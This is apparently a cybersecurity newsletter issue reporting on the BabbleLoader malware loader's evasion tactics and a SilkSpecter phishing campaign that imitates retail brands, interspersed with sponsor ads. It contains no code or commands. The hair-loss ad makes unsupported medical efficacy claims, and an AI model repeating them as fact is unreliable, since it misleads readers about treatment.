Novaxidil is a Premium OTC Triple Action hair loss treatment that stimulates hair regrowth, prevents further loss, AND nourishes your scalp with a combination of clinically proven ingredients: 5% Minoxidil, 2% K-Conazole, 1% Nicotinamide, Vitamin K, Biotin, and Collagen Peptides.

Our team of MD/PhD's formulated Novaxidil to maximize results while minimizing side effects.

MINOXIDIL 5%: Minoxidil is the Gold Standard for hair regrowth. It achieves this by shortening the telogen phase, extending the anagen phase, increasing blood flow to the scalp, and increasing dermal papilla cell activity.

K-CONAZOLE™ 2%: Studies have shown that K-Conazole™, a proprietary version of the popular compound, blocks the production of dihydrotestosterone (DHT), a hormone linked to male pattern baldness, as effectively as prescription alternatives like FINA without the side effects. It works by inhibiting the 5-alpha reductase (5AR) enzyme, which converts testosterone into DHT.

NICOTINAMIDE 1%: Nicotinamide, also known as niacinamide, has potent effects on hair regrowth. In studies, it has been shown to increase blood flow, and reduce inflammation to the scalp, as well as prevent premature catagen entry, and increase hair thickness. Nicotinamide works in synergy with Minoxidil, and K-Conazole™ to maximize hair regrowth, and minimize loss like no other product on the market!

Before you give up, and start rocking the "bald look," give Novaxidil a try. We're confident you won't regret it.

Learn More

Hackers: Here I go again on my own 🎶

 🚨 New Malware Loader, BabbleLoader, Evades Detection with Stealthy Tactics ♟️ 

Cybersecurity experts have identified BabbleLoader, a highly evasive malware loader that bypasses antivirus and sandbox detection to install data-stealing malware like WhiteSnake and Meduza. Designed to avoid traditional and AI-based defenses, BabbleLoader is being deployed in multiple campaigns, specifically targeting individuals searching for cracked software as well as finance and administrative professionals.

Key Features of BabbleLoader 🛡️

  • Dynamic Evasion: BabbleLoader can change its structure on the fly, adding junk code and unique control flows with each build to elude detection by altering its code and metadata every time. These variations make it hard for traditional antivirus and AI to detect it. 🧩

  • Runtime Function Resolution: To avoid static detection, BabbleLoader only resolves required functions during runtime, making it tougher to identify through signature-based approaches. ⚙️

  • Sandbox Resistance: It’s designed to detect and thwart sandboxing tools, causing software like IDA and Ghidra to crash, impeding analysts' efforts to inspect it.

BabbleLoader in Action 🕵️‍♂️

Once executed, BabbleLoader instals shellcode that decrypts the payload, handing over control to the Donut loader to initiate malware like WhiteSnake and Meduza. BabbleLoader is part of an increasing trend of “loaders,” joining similar tools like Dolphin Loader and FakeBat that cybercriminals use to propagate information stealers, ransomware, and RATs (Remote Access Trojans) by skirting around traditional detection.

Wider Malware Landscape 🌐

BabbleLoader’s emergence follows a series of malware findings, including LodaRAT, a RAT capable of stealing cookies, credentials, and sensitive data, recently spotted alongside Cobalt Strike and Donut loader infections. There’s also Mr.Skeleton RAT, which allows hackers to remotely control victims’ systems, manipulate files and registries, and even access webcams.

Implications for Security 🔍

As BabbleLoader and similar loaders become more common, businesses and users alike need to update and diversify defence tactics to address increasingly evasive cyber threats.

Learn AI in 5 Minutes a Day

AI Tool Report is one of the fastest-growing and most respected newsletters in the world, with over 550,000 readers from companies like OpenAI, Nvidia, Meta, Microsoft, and more.

Our research team spends hundreds of hours a week summarizing the latest news, and finding you the best opportunities to save time and earn more using AI.

Sign up with 1-Click

Hack Friday 💀 

🚨 New Phishing Campaign Targets Holiday Shoppers w/ Fake Brand Discounts 🎣 

As Black Friday approaches, a phishing campaign is preying on online shoppers in Europe and the U.S., posing as well-known brands to steal personal and financial information. The SilkSpecter group, a Chinese threat actor, has been mimicking major brands like IKEA, North Face, and Wayfair to lure users into fake discount deals on phishing sites.

How the Scam Works 🕵️‍♀️

  • Fake Discounted Products 🎁: Sites, often under domains like .shop and .vip, appear to offer Black Friday deals. Victims are encouraged to provide credit card data (CHD), sensitive authentication details (SAD), and personal information (PII).

  • Geolocation Language Detection 🌎: Using Google Translate, the phishing pages change language based on visitors' regions, adding credibility.

  • Tracking Pixels 📊: Trackers like OpenReplay and TikTok Pixel monitor user activity to refine targeting.

The Payment Trap 💳

These fake sites use Stripe to create a legitimate-looking checkout. However, any card details entered are stolen. Users are also asked for their phone numbers—a setup for follow-on attacks, such as smishing and vishing, to steal more information, like 2FA codes.

SEO Tactics and Social Media 🚀

To increase visibility, SEO poisoning tactics may push these sites to the top of search results. Attackers could also share links via social media to catch unsuspecting shoppers.

Related Black Hat Operations 🎩

Other phishing campaigns, such as Phish ‘n’ Ships, employ similar tactics, infecting real websites to sell fake products. In these scams, users make payments, but the items never arrive. 

As online shopping surges this season, shoppers should stay vigilant—verify site URLs, avoid pop-up discounts, and prioritise secure payment methods!

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter